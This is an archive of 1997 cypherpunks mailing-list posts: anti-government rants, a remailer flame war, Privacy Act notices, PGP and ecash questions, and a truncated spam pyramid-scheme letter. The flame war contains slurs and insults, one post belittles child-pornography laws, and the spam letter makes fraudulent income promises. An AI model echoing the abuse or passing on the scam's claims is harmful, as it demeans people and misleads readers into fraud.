citizen's assholes." Priorities. We have to have priorities. PriorityMonger From nobody at REPLAY.COM Fri Aug 15 04:10:01 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 19:10:01 +0800 Subject: Cartel Leaders Set Snipers To Work In Border War Message-ID: <199708151054.MAA08022@basement.replay.com> Tim May wrote: > > According to this article, the home addresses of government agents are > being solicited by Mexican drug dealers, for disposal of agents > interfering in their business. A major thrust of the article deals with the government promotion of the idea that the "bad guys" have actively declared war upon agents of the U.S. government, on U.S. soil. Strange that this claim should come from a variety of sources at the same time the government is facing the embarassment of having to whitwash the actions of heavily armed, camouflaged Marines who felt so threatened by a goat-herder with a .22 rifle that they slaughtered him with their M-16's, despite the fact that the child was an American citizen, doing what he had every right to do, on American soil. The drug cartels are having such little trouble getting drugs into the U.S. that cocaine and heroine are cheaper than a bottle of good Scotch, yet, according to the government, they have decided that it is necessary to perform actions which will "force" the government to 'crack down' on border terrorism with increasing use of armed force. Right... I bet the child pornography cartels are arming themselves, even as we speak, preparing to join the drug cartels in their war against the U.S. governement. We'd better send some Marines to Denver, New York City, and Fargo. Then everybody but the high-school goat herders will feel much safer, I'm sure. GiveMeAFuckingBreakMonger "There is something wrong when U.S. armed forces murder American schoolchildren on American soil, under an increasing number of unconstitutional laws." > > Date: Thu, 14 Aug 1997 22:42:08 -0700 (PDT) > > Message-ID: <199708150542.WAA25283 at sirius.infonex.com> > > From: Mix > > Comments: This message did not originate from the address above. It was > remailed by an anonymous remailing service. If you have questions or > complaints, please direct them to > > Subject: Cartel Leaders Set Snipers To Work In Border War > > Newsgroups: > talk.politics.guns,misc.legal,misc.survivalism,alt.news-media,alt.politics.usa.misc,alt.politics.media,alt.politics.clinton > > Mail-To-News-Contact: postmaster at nym.alias.net > > Organization: mail2news at nym.alias.net > > Lines: 58 > ... > > Cartel leaders set snipers to work in border 'war' > > By John Hiscock Electronic Telegraph, London > > > > August 11, 1997 > > > > AMERICAN Border Patrol agents have become targets of snipers working > > for drug smugglers trying to take control of the border with Mexico. A > > five-mile strip of frontier near San Diego in California has become so > > dangerous that a specially-trained squad of border patrol sentries > > armed with assault rifles has been drafted in to combat the snipers, > > who have fired at agents seven times in the past two months. > > > > The agents believe that Mexican drug cartel leaders have issued > > instructions to kill any law enforcement officers impeding drug > > smuggling operations. Their fears have been heightened by a bulletin > > from the Immigration and Naturalisation Service that said two drug > > cartel leaders in the Mexican border city of Tijuana had "reportedly > > contracted with local gangs on both sides of the border to kill > > federal law enforcement personnel", preferably on American soil. In > > addition, officers recently received reports that cartel henchmen have > > put a price on their heads by offering to pay £7,000 for the > > home address of any United States federal agent. > > > > Dianne Feinstein, a Californian senator, says that border patrol > > agents, whose job until recently was to arrest mainly frightened and > > unarmed Mexicans trying to cross the frontier at night, are now in the > > front line of a vicious drug war. "This is a border on alert, a border > > where anything could happen," she said. "These cartels are moving > > drugs across the border and are operating with impunity and that adds > > an increased risk to the lives of border patrol agents. This is a > > different border than it was two years ago." > > > > In addition to being the most popular spot for illegal aliens > > attempting to cross, the border around San Diego is now the main > > gateway for cocaine and heroin bound for the US. Since the > > introduction of Operation Gatekeeper, President Clinton's 1994 > > anti-illegal alien initiative that poured more money and agents into > > the San Diego area, the drug smugglers have found themselves > > increasingly caught up in the patrols' swoops on illegal > > border-crossers. > > > > "We've made it increasingly difficult for drug traffic," said John > > Williams, the chief of San Diego's 2,000-strong border patrol sector. > > "We're making it tough on crime and that certainly has some bearing on > > their reaction. The escalation of violence is of grave concern to me > > and my agents." > > > > Members of the elite special protection unit carry M-16 assault > > rifles, with a range of more than a mile, while all agents are now > > being issued with semi-automatic pistols and shotguns. > > -- > There's something wrong when I'm a felon under an increasing number of laws. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1398269 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." From nobody at REPLAY.COM Fri Aug 15 04:32:09 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 19:32:09 +0800 Subject: "Morphed" child porn case ruling text (FSC v. Reno) Message-ID: <199708151117.NAA09805@basement.replay.com> Mike Duvos wrote: > While I suspect the typical citizen is unlikely to have a particularly > strong reaction one way or the other to sexual depictions of children, as > long as it is not a photographic record of an actual child being treated > abusively, there is a obvious subset of frothy pointy-headed individuals > who should be shielded from such material at all costs, or they may be > completely unable to control their behavior. > > They are of course the self-appointed "child protectors", none of whom > could care less about what rights children really need or want, as long as > no one appears naked. Question: "If someone did a study that conclusively proves that free availability of child pornography leads to a substantial decrease in the amount of child abuse taking place, will our legislators and our ministers support the legalization of child pornography? Answer: "Right... And I'm the fucking pope..." When did protecting abused children become such a high priority for the fascists? When people told them to shove their fascism under the banner of "moral values" up their ass. If we wipe drug abuse and child abuse from the face of the earth, the fascists will decide that pictures of naked people cause tooth decay, and launch a "War Against Bad Dental Hygiene." Of course, this will mean that Law Enforcement will need the power to check inside our mouths at their every whim, and imprison people who have dental cavities. PopeMonger "I am not a mushroom..." From jya at pipeline.com Fri Aug 15 04:44:33 1997 From: jya at pipeline.com (John Young) Date: Fri, 15 Aug 1997 19:44:33 +0800 Subject: Electronic Surveillance Indices Message-ID: <1.5.4.32.19970815111956.006fe0c8@pop.pipeline.com> >From the Privacy Act Online via GPO Access [wais.access.gpo.gov] [DOCID:jus_fbi-7] DEPARTMENT OF JUSTICE JUSTICE/FBI 006 System name: Electronic Surveillance (Elsur) Indices. System location: Federal Bureau of Investigation, J. Edgar Hoover Bldg., 10th and Pennvylvania Ave., NW, Washington, DC 20535. Those field offices which have sought conducted electronic surveillances also maintain an index. See appendix to System 022. Categories of individuals covered by the system: Individuals who have been the targets of direct electronic surveillance coverage by FBI in a court order; those whose communications have been monitored/intercepted by an FBI electronic surveillance installation; those who won, lease, or license premises subjected to electronic surveillance coverage sought by the FBI in a court order. Categories of records in the system: The ELSUR Index is comprised of three types of 3 x 5 cards: 1. Principal cards identify, by true name or best known name, all interceptees (targets) identified in an application filed by the FBI in support of an affidavit seeking a court order to conduct an electronic surveillance; 2. Proprietary Interest cards identify entities and/or individuals who own, lease, license or otherwise hold a possessory interest in locations subjected to an electronic surveillance sought by the FBI in a court order; and, 3. Overhear cards identify, by true name or best known name, individuals and/or entities who have been reasonably identified by a first name or initial and a last name a being a party to a communication monitored/ intercepted by the FBI. Authority for maintenance of the system: The ELSUR Index was initiated in October, 1966, at the recommendation of the Department of Justice and relates to electronic surveillances conducted/ sought by the FBI since 1/1/60. The authority for the maintenance of these records is Title 5, Section 301, USC, which grants the Attorney General the authority to issue rules and regulations prescribing how Department of Justice information can be employed. Title 18, U.S.C., Section 3504, also sets forth recordkeeeping requirements. Routine uses of records maintained in the system, including categories of users and the purposes of such uses: The Elsur Indices are utilized: (1) To respond to judicial inquiries about possible electronic surveillance coverage of witnesses, defendants, or attorneys involved in Federal court proceedings, and (2) To enable the Government to certify whether a person regarding whom court-order authority is being sought for electronic coverage has ever been so covered in the past. The actual users of the indices are always employees of the FBI. In addition, information may be released to the news media and the public pursuant to 28 CFR 50.2 unless it is determined that release of the specific information in the context of a particular case would constitute an unwarranted invasion of personal privacy; Member of Congress or staff acting upon the member's behalf when the member or staff requests the information on behalf of and at the request of the individual who is the subject of the record; and, to the National Archives and Records Administration and the General Services Administration in records management inspections conducted under the authority of 44 U.S.C. 2904 and 2908 to the extent that legislation governing the records permits. Policies and practices for storing, retrieving, accessing, retaining, and disposing of records in the system: Storage: The records are maintained manually on 3 x 5 cards. Retrievability: Names/facilities are indexed and filed alphabetically. Telephone numbers and other such serial or identification numbers targeted are indexed and filed numerically. Locations targeted are indexed by address and filed by street name. Safeguards: The index is maintained in a restricted access room at all times. The entrance is equipped with a special locking device and alarm system for off-duty hours when the index is not in use. Retention and disposal: Until advised to the contrary by the Department, the courts or Congress, these indices will be maintained indefinitely. The indices have been declared permanent by NARA. (Job No. NC1-65-82--4, Part E. 2. t.) System manager(s) and address: Director, Federal Bureau of Investigation, Washington, DC 20535. Notification procedure: Same as the above. Record access procedures: Inquiry addressed to Director, FBI, Washington, DC 20535. Contesting record procedures: Same as the above. Record source categories: Category of Individual. Systems exempted from certain provisions of the act: The Attorney General has exempted this system from subsections (c) (3) and (4), (d), (e) (1), (2) and (3), (e)(4) (G) and (H), (e) (5) and (8), (f), (g) and (m) of the Privacy Act pursuant to 5 U.S.C. 552a(j). Rules have been promulgated in accordance with the requirements of 5 U.S.C. 553 (b), (c) and (e) and have been published in the Federal Register. From jya at pipeline.com Fri Aug 15 05:04:06 1997 From: jya at pipeline.com (John Young) Date: Fri, 15 Aug 1997 20:04:06 +0800 Subject: Export Transactions Espionage Message-ID: <1.5.4.32.19970815113705.006fa714@pop.pipeline.com> >From the Privacy Act Online via GPO Access [wais.access.gpo.gov] [DOCID:commer-31] DEPARTMENT OF COMMERCE COMMERCE/ITA-1 System name: Individuals Identified in Export Transactions-- COMMERCE/ITA-1. System location: Office of Export Administration, ITA, U.S. Department of Commerce, 14th St. and Constitution Ave., NW, Washington, DC 20230. Categories of individuals covered by the system: a. Individuals involved in export transactions. Information is maintained on domestic and foreign companies and business officials, and includes U.S. citizens involved with or working for firms abroad. b. Individuals identified in an export administration compliance proceeding or investigation. Individuals alleged to have violated the Export Administration regulations; established violators of the regulations; certain other individuals identified by the FBI or other investigating agency or individual in the investigative process such as those involved in organized crime; and individuals who have received warning letters. Categories of records in the system: Reports and cables from U.S. foreign service posts. Reports from F.B.I., other law enforcement or investigative agencies, investigators, or informants; investigative and intelligence data; documented violations; warning letters. Includes any information on alleged or proven violators of the Export Administration Act. Authority for maintenance of the system: Export Administration Act of 1979 (Pub. L. 96-72, 50 U.S.C. App. et seq.). 5 U.S.C. 301, 28 U.S.C. 533-535, 44 U.S.C. 3101. Routine uses of records maintained in the system, including categories of users and the purposes of such uses: See routine use paragraphs 1-5 and 8-13 of the Prefatory Statement. Policies and practices for storing, retrieving, accessing, retaining, and disposing of records in the system: Storage: Paper records in file folders. Retrievability: Information filed by case or subject file. All names are cross-referenced by name card file. Safeguards: Records are located in lockable metal file cabinets or in metal file cabinets in secured rooms or secured premises with access limited to those whose official duties require access. Retention and disposal: Retained for a reasonable period of time. Disposition is recorded. System manager(s) and address: Director, Compliance Division, Office of Export Administration, ITA, U.S. Department of Commerce, Washington, DC 20230. Notification procedure: Information may be obtained from: Privacy Officer, Office of Management and Systems, ITA, Room 3102, U.S. Department of Commerce, Washington, DC 20230. Requester should provide name, address, and case or subject, if known, pursuant to the inquiry provisions of the Department's rules which appear in 15 CFR part 4b. Record access procedures: Requests from individuals should be addressed to: Same address as stated in the notification section above. Contesting record procedures: The Department's rules for access, for contesting contents, and appealing intial determinations by the individual concerned appear in 15 CFR part 4b. Use above address. Record source categories: Individual exporters, those authorized by the individual exporters to furnish information, trade sources, investigative agencies, intelligence, investigative and other personnel of the Office of Export Administration, informants, CIA, FBI, Justice Department, Defense Department, Energy Department, and State Department. Systems exempted from certain provisions of the act: Pursuant to 5 U.S.C. 552a(j)(2), all information about an individual in the record which meets the criteria stated in 5 U.S.C. 552a(j)(2) are exempted from the notice, access and contest requirements of the agency regulations and from all parts of 5 U.S.C. 552a except subsections (b), (c)(1) and (2), (e)(4)(A) through (F), (e)(6), (7), (9), (10), and (11), and (i), and pursuant to 5 U.S.C. 552a(k)(1) and (k)(2) on condition that the 5 U.S.C. 552a(j)(2) exemption is held to be invalid, all investigatory material in the record which meets the criteria stated in 5 U.S.C. 552a(k)(1) and (k)(2) are exempted from the notice, access, and contest requirements (under 5 U.S.C. 552a(c)(3), (d), (e)(1), (e)(4)(G), (H), and (I), and (f)) of the agency regulations because of the necessity to exempt this information and material in order to accomplish this law enforcement function of the agency, to prevent subjects of investigation from frustrating the investigatory process, to prevent the disclosure of investigative techniques, to fulfill commitments made to protect the confidentiality of sources, to maintain access to sources of information, and to avoid endangering these sources and law enforcement personnel. Section 12(c) of the Export Administration Act of 1979 also protects certain of this information and material related to export licenses from disclosure. From anon at anon.efga.org Fri Aug 15 05:35:12 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 20:35:12 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) Message-ID: At 09:58 AM 8/15/97 +0200, you wrote: >I wrote two remailer programs, I ran several remailers, and I am working >on bugfixes for replay. I couldn't care less about your founding >fathers who killed the native americans and raped their women. >Killing virtually unarmed people with guns is an act of cowardice. According to you, remailer using people are cowards. So quite frankly, why the hell are you helping remailers if you get so pissed at people using them? Sounds like you don't have your priorities straight. >Flaming me through a remailer is the equivalent of shouting >'hey asshole!' and then running away. Children do it often. If that's what you think of the blessed gift of anonymity, then, quite frankly, FUCK YOU. Theres's nothing childish about using remailers, and if you think otherwise, then stop making them! >I also cannot reply to you privately, so all other members of >this mailinglist have to suffer our private flamewar. I think they might even join in the fun. Have a nice day, remailer hating Nazi. From nobody at REPLAY.COM Fri Aug 15 05:51:15 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 20:51:15 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Message-ID: <199708151240.OAA16842@basement.replay.com> >Patrick Oonk wrote: >Flaming me through a remailer is the equivalent of shouting >'hey asshole!' and then running away. Children do it often. Maybe you should stop being such an asshole to those children. From nobody at neva.org Fri Aug 15 06:01:58 1997 From: nobody at neva.org (Neva Remailer) Date: Fri, 15 Aug 1997 21:01:58 +0800 Subject: Cartel Leaders Set Snipers To Work In Border War Message-ID: <199708151234.HAA17799@dfw-ix14.ix.netcom.com> Tim May wrote: > Glad I'm not a DEA or INS agent. > > Cartel leaders set snipers to work in border 'war' > > By John Hiscock Electronic Telegraph, London > > AMERICAN Border Patrol agents have become targets of snipers working > > for drug smugglers trying to take control of the border with Mexico. A > > five-mile strip of frontier near San Diego in California has become so > > dangerous that a specially-trained squad of border patrol sentries > > armed with assault rifles has been drafted in to combat the snipers, > > who have fired at agents seven times in the past two months. Replacing the Marines who murdered an American teenager. Funny that the drug cartels never felt a need to assassinate border patrol agents until the American public found it unacceptable for U.S. troops to be murdering American citizens. > > The agents believe that Mexican drug cartel leaders have issued > > instructions to kill any law enforcement officers impeding drug > > smuggling operations. Their fears have been heightened by a bulletin > > from the Immigration and Naturalisation Service that said two drug > > cartel leaders in the Mexican border city of Tijuana had "reportedly > > contracted with local gangs on both sides of the border to kill > > federal law enforcement personnel", preferably on American soil. In > > addition, officers recently received reports that cartel henchmen have > > put a price on their heads by offering to pay £7,000 for the > > home address of any United States federal agent. Have they "received reports" as to the logic behind these actions by the cartel "henchmen?" Do the cartel henchmen think that the assassinated U.S. agents will not be replaced? Do they think that assassinating U.S. agents will lead to lessened security along the border? Do they expect the U.S. governement to put up "Welcome Drug Smugglers...We Surrender" posters all along the border? Right. I got a parking ticket, so I'm going to put out a contract on the meter-maid. That'll solve all my parking ticket problems. Then the police will leave me alone. Why didn't I think of this before? > > Dianne Feinstein, a Californian senator, says that border patrol > > agents, whose job until recently was to arrest mainly frightened and > > unarmed Mexicans trying to cross the frontier at night, are now in the > > front line of a vicious drug war. "This is a border on alert, a border > > where anything could happen," she said. "These cartels are moving > > drugs across the border and are operating with impunity and that adds > > an increased risk to the lives of border patrol agents. This is a > > different border than it was two years ago." The cartels only began moving drugs across the border in the last two years? Border Patrol agents have never been shot at before? Are the drug cartel snipers worse shots than the U.S. marines? How many American teenage goat herders have the drug cartels murdered so far? > > Since the > > introduction of Operation Gatekeeper, President Clinton's 1994 > > anti-illegal alien initiative that poured more money and agents into > > the San Diego area, the drug smugglers have found themselves > > increasingly caught up in the patrols' swoops on illegal > > border-crossers. > > > > "We've made it increasingly difficult for drug traffic," said John > > Williams, the chief of San Diego's 2,000-strong border patrol sector. This explains why America is practically drug-free, with only twice as many grade school children using heroin as at this time last year. If we can keep up the pressure along the border, perhaps one day _all_ of our children will be junkies. Good reasoning... > > "We're making it tough on crime and that certainly has some bearing on > > their reaction. The escalation of violence is of grave concern to me > > and my agents." > > > > Members of the elite special protection unit carry M-16 assault > > rifles, with a range of more than a mile, while all agents are now > > being issued with semi-automatic pistols and shotguns. And this is going to protect them from snipers and hired assassins who the drug cartels are sending to their homes to murder them? How many illegal immigrants and American border citizens are going to be killed in "mistaken self-defence" before they consider it is now necessary to arm themselves for protection? How far will the Border Patrol need to feed the "escalation of violence" before the President feels comfortable to once again begin unconstitutionally using the Armed Forces to enforce laws internally in the U.S.? Why do these idiots go to such great lengths to spread FUD as a smokescreen to help whitewash the murder of American citizens by U.S. Armed Forces being unconstitutionally deployed internally within the U.S.? The Border Patrol has always had the authority to use armed agents to defend our borders, and they have always had special units to deal with areas which have become more violent than usual. The latest "announcements" have nothing to do with "news." They have to do with smokescreen-FUD. TruthMonger From anon at anon.efga.org Fri Aug 15 06:04:28 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 15 Aug 1997 21:04:28 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) Message-ID: At 12:54 PM 8/15/97 +0200, you wrote: > Strange that this claim should come from a variety of sources at >the same time the government is facing the embarassment of having to >whitwash the actions of heavily armed, camouflaged Marines who felt >so threatened by a goat-herder with a .22 rifle that they slaughtered >him with their M-16's, despite the fact that the child was an American >citizen, doing what he had every right to do, on American soil. FWIW, those murdering bastards got off the hook, because the jury believed they were "good soldiers", and I thought "Goodness must now mean how many innocents you kill while waiting to shoot a stoned Mexican carrying a bag of pot walking across the border. > The drug cartels are having such little trouble getting drugs into >the U.S. that cocaine and heroine are cheaper than a bottle of good >Scotch, yet, according to the government, they have decided that it >is necessary to perform actions which will "force" the government >to 'crack down' on border terrorism with increasing use of armed >force. Right... Hell, why not just declare martial law!? If were going to use marines as police, what next? The war on Goat-Herding Cartels!?!?!? I myself have never heard of a bunch of Heavily armed mexicans running over the border with explosives, automatic weapons, and Molotov Cocktails burning down houses, shooting marines, or blowing up buildings. >GiveMeAFuckingBreakMonger >"There is something wrong when U.S. armed forces murder American > schoolchildren on American soil, under an increasing number of > unconstitutional laws." KillThoseMurderingMarineBastardsMonger "There's something wrong when we replay prohibition and kill innocents in the process." From nobody at REPLAY.COM Fri Aug 15 06:04:36 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Aug 1997 21:04:36 +0800 Subject: McVeigh to die, quotes Brandeis Message-ID: <199708151228.OAA15959@basement.replay.com> Declan McCullagh wrote: > By SANDY SHORE

> Associated Press Writer

> DENVER (AP) - Timothy McVeigh was formally sentenced to death > today for the Oklahoma City bombing after he quoted Supreme Court Justice > Louis Brandeis that the government "teaches the whole people by its > example." And the morning news anchor on CBS tells the country, "McVeigh's statement is open to a wide variety of conflicting interpretations." (I guess he hasn't been following the news too closely.) Did anyone else on the CypherPunks list interpret McVeigh's statement to mean that the people should lie, steal, and oppress others, or am I the only one who interpreted it this way? Or perhaps he meant we should murder anyone who claims to be Jesus, as well as the men, women and children who believe in him. Been there, done that... Pontius Pilate From nate at infidels.org Fri Aug 15 06:04:53 1997 From: nate at infidels.org (Nate Sammons) Date: Fri, 15 Aug 1997 21:04:53 +0800 Subject: PGP for palmtops? Message-ID: Does PGP exist for palmtops like the HP 320LX? I would assume (possibly foolishly) that the port would be easy, as they run Windows CE. -nate From patrick at atro.pine.nl Fri Aug 15 06:05:02 1997 From: patrick at atro.pine.nl (Ratprick Oink) Date: Fri, 15 Aug 1997 21:05:02 +0800 Subject: Remailer hating Nazis Message-ID: <33F44F50.5791@atro.pine.nl> Patrick Oonk stuttered and drooled: > An Anonymous Coward wrote: > > The remailer hating Nazi called Patrick Oonk wrote: > > >At least I don't hide behind a remailer. > > There's no cowardice to it, dumbass. Our founding fathers and others wrote things anonymously. I guess they're cowards? > I wrote two remailer programs, I ran several remailers, and I am working > on bugfixes for replay. Did you shut down those "several remailers" out of...cowardice? > Flaming me through a remailer is the equivalent of shouting > 'hey asshole!' and then running away. Sorry to hear you have such a low opinion of those who use anonymous remailers. Is your work on remailers an 'ego' thing, or are you a cop? > I also cannot reply to you privately, so all other members of > this mailinglist have to suffer our private flamewar. You want to "hide behind" private email? Ashamed of your beliefs and don't want them made public? When did this become a "private" flamewar, shit-for-brains? Are you under the mistaken impression that your public post to this list has drawn negative replies from only a single anonymous source? My heart, also, bleeds purple piss for the poor, fragile young cypherpunks who will suffer needlessly, perhaps being traumatized for life, by exposure to negative energy and obscene words like "dumbass." However, some of the older, more experienced members of the cypherpunks list have long ago learned to make the best of a bad situation, and amuse themselves by using their dick to press the key. So spam me, big boy. Spam me. AnonymousCowardMonger From Michael.Johnson at mejl.com Fri Aug 15 06:07:12 1997 From: Michael.Johnson at mejl.com (Mike) Date: Fri, 15 Aug 1997 21:07:12 +0800 Subject: Getting ecash without an MTB account In-Reply-To: <3.0.3.32.19970811092630.009d5950@localhost> Message-ID: <3.0.3.32.19970815144631.00989bd0@localhost> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Jeremey Barrett wrote: >BTW, there are better solutions to operating without a mint account, >but they are not widely available yet. Are you referring to the receiver anonymous protocol? This is how I understand that protocol, Alice wants to receive e$1 from Bob. She creates a random number, blinds it, and gives the blinded number to Bob. He shows the number to the Mint, asking for a withdrawal of e$1 with a signature on this coin number. Bob gives the signed and still blinded coin to Alice. She unblinds it and spends it, end of story. I thought that in this scenario, Bob can spend the coin before he gives it to Alice, so she runs the risk of receiving a coin that has already been spent. Is it impossible to spend a blinded coin if you can't unblind it? Or are you thinking of something totally different? -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBM/Rda8Uc8bdD9cnfEQI0wgCfQJb5KR0P+F0zfRqD+r0v98tKHrYAn2gF rmIGdBzCyeZnzIjuVVa+hQGy =gXCF -----END PGP SIGNATURE----- Mike. From patrick at atro.pine.nl Fri Aug 15 06:21:22 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Fri, 15 Aug 1997 21:21:22 +0800 Subject: Remailer hating Nazis (was Re: The BIG Lie (Jesus Confesses)) In-Reply-To: Message-ID: <199708151303.PAA18635@atro.pine.nl> > > > At 09:58 AM 8/15/97 +0200, you wrote: > >I wrote two remailer programs, I ran several remailers, and I am working > >on bugfixes for replay. I couldn't care less about your founding > >fathers who killed the native americans and raped their women. > >Killing virtually unarmed people with guns is an act of cowardice. > > According to you, remailer using people are cowards. So quite frankly, why the hell are you helping remailers if you get so pissed at people using them? > > Sounds like you don't have your priorities straight. You can't read, obviously. What I said was that it's a bit lame to flame me and call me names, without giving me the oppportunity to mail you directly, w/o bothering the other people on this list. > > >Flaming me through a remailer is the equivalent of shouting > >'hey asshole!' and then running away. Children do it often. > > If that's what you think of the blessed gift of anonymity, then, quite frankly, FUCK YOU. Theres's nothing childish about using remailers, and if you think otherwise, then stop making them! > You twist my words around. By the way, where did your wig-wearing faggot founding fathers of you suddenly go ? Start coding, instead of just flaming people. Post-natal abortion would have been a good solution for you. -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From patrick at atro.pine.nl Fri Aug 15 06:48:15 1997 From: patrick at atro.pine.nl (Patrick Oonk) Date: Fri, 15 Aug 1997 21:48:15 +0800 Subject: Remailer hating Nazis In-Reply-To: <33F44F50.5791@atro.pine.nl> Message-ID: <199708151322.PAA18863@atro.pine.nl> Some word-twisting asshole wrote: > Sorry to hear you have such a low opinion of those who use > anonymous remailers. Is your work on remailers an 'ego' thing, > or are you a cop? I am a cop, but it boosts my ego too. > You want to "hide behind" private email? Ashamed of your beliefs > and don't want them made public? Definitively. I am full of shit. > When did this become a "private" flamewar, shit-for-brains? Are > you under the mistaken impression that your public post to this > list has drawn negative replies from only a single anonymous > source? I am pretty sure there is only one person as sad as you are. (Except me of course). > So spam me, big boy. Spam me. Let the pros stick to that. -- | Patrick Oonk - http://patrick.mypage.org/ - patrick at pine.nl | | PGP Key ID 0xDA2E93FA - Internic PO59 - | | Pine Internet B.V. Consultancy, installatie en beheer | | Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ | From dformosa at st.nepean.uws.edu.au Fri Aug 15 06:52:59 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 15 Aug 1997 21:52:59 +0800 Subject: Remailer hating Nazis In-Reply-To: <33F44F50.5791@atro.pine.nl> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 15 Aug 1997, Ratprick Oink wrote: > Patrick Oonk stuttered and drooled: [...] > > Flaming me through a remailer is the equivalent of shouting > > 'hey asshole!' and then running away. > > Sorry to hear you have such a low opinion of those who use > anonymous remailers. He has a low option of peaple who flame though Anon remailers. Wich is a totaly diffrent stament to saying all peaple who use remailers. Or can you only think of the use of reamilers for this perpose. > Is your work on remailers an 'ego' thing, I'm shar he is working on them because like most of us he knows the need for anonminity. In fact I don't realy care why he works on the remailers, he could be seting them up cause the sausor peaple told him to, as long as peaple can use them and there secure he is doing good. Flaming via Anon reamilers is bad, not because its done via an anon reamiler but because Flamming is mostly bad. Posting internal secret Scintioligoy documents proving there involvement in tax frad is good not because it is done via an anon reamiler but because attacking COS is good. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM/Qe4aQK0ynCmdStAQFT1QQAzQP8BoDXo0JhEt4vPQPyKIwM5puQPYHX uMUY3L8sLIAUQoaUXadJWozBKQ6csMx0TinyylodWm9ux60o2AndhJVQhYmvMCjW x+q9UeH5OX1w1VqRs+fNbGUt8+c7B5IckwNyVpGeuPnxD57nh93+GOCzZUn/9p+w YWPi9w+iosM= =gP84 -----END PGP SIGNATURE----- From Money at Eaglequest.Com Fri Aug 15 22:06:29 1997 From: Money at Eaglequest.Com (Money at Eaglequest.Com) Date: Fri, 15 Aug 1997 22:06:29 -0700 (PDT) Subject: ** Financial Freedom ** Message-ID: <1997021070025.GAA0/056@Eaglequest.Com> /////////////////////////////////////////////////////////////////////////////// You Do not want toTrash This one !!!!! Read This Twice!!!!! Please accept my apology if this were sent to you in error! <> <> <> <> <> <> <> <> <> <> <> <> <> <> <> <> You could make at least $50,000 - In less than 90 days Read the enclosed program . . . THEN READ IT AGAIN! ... <> <> <> <> <> <> <> <> <> <> <> <> <> <> <> <> Dear Friend, The enclosed information is something I almost let slip through my fingers. Fortunately, sometime later I reread everything and gave some thought and study to it. My name is Christopher Erickson. Two years ago, the corporation I worked at for the past twelve years downsized and they eliminated my position. After unproductive job interviews, I decided to open my own business. Over the past year, I incurred many unforeseen financial problems. I owed my family, friends, and creditors more than $35,000. The economy was taking a toll on my business and I just could not seem to make ends meet. I had to refinance and borrow against my home to support my family and struggling business. I truly believe it was wrong for me to be in debt like this. AT THAT MOMENT something significant happened in my life and I am writing to share my experience in hopes that this will change your life FOREVER . . . FINANCIALLY!!! In mid-December, I received this program via email. Six months before receiving this program I had been sending away for information on various business opportunities. All of the programs I received, in my opinion, were not cost effective. They were either too difficult for me to comprehend or the initial investment was too much for me to risk seeing if they worked or not. One claimed I had made a million dollars in one year . . . it didn't tell me I'd have to write a book to make it. But like I was saying, in December of '92 I received this program. I did not send for it, or ask for it, they just got my name off a mailing list. THANK GOODNESS FOR THAT!!! After reading it several times, to make sure I was reading it correctly, I could not believe my eyes. Here was a MONEY MAKING PHENOMENON. I could invest as much as I wanted to start, without putting me further in debt. After I got a pencil and paper and figured it out, I would at least get my money back. After determining that the program is LEGAL and NOT A CHAIN LETTER, I decided "WHY NOT." Initially I sent out 10,000 emails. It only cost me about $15.00 for my time on-line. The great thing about email is that I did not need any money for printing to send out the program, only the cost to fulfill my orders. I am telling you like it is, I hope it does not turn you off, but I promised myself that I would not "rip-off" anyone, no matter how much money it cost me! . In less than one week, I was starting to receive orders for REPORT #1. By January 13th, I had received 26 orders for REPORT #1. When you read the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15 TO 20 ORDERS FOR REPORT #1 WITHIN TWO WEEKS. IF YOU DO NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO!" My first step in making $50,000 in 20 to 90 days was done. By January 30th, I had received 196 orders for REPORT #2. If you go back to the GUARANTEE, "YOU MUST RECEIVE 100 OR MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO. ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL." Well, I had 196 orders for REPORT #2, 96 more than I needed. So I sat back and relaxed. By March 19th, of my emailing of 10,000, I received $58,000 with more coming in every day. I paid off ALL my debts and bought a much needed new car. Please take time to read the attached program. It WILL CHANGE YOUR LIFE FOREVER! Remember, it will not work if you do not try it. This program does work, but you must follow it EXACTLY! Especially the rules of not trying to place your name in a different place. It doesn't work, you'll lose out on a lot of money! REPORT #2 explains this. Always follow the guarantee, 15 to 20 orders for REPORT #1, and 100 or more orders for REPORT #2. You will make $50,000 or more in 20 to 90 days. I AM LIVING PROOF THAT IT WORKS!!! If you choose not to participate in this program, I am sorry. It really is a great opportunity with little cost or risk to you. If you choose to participate, follow the program and you will be on your way to financial security. If you are a fellow business owner and you are in financial trouble like I was, or you want to start your own business, consider this a 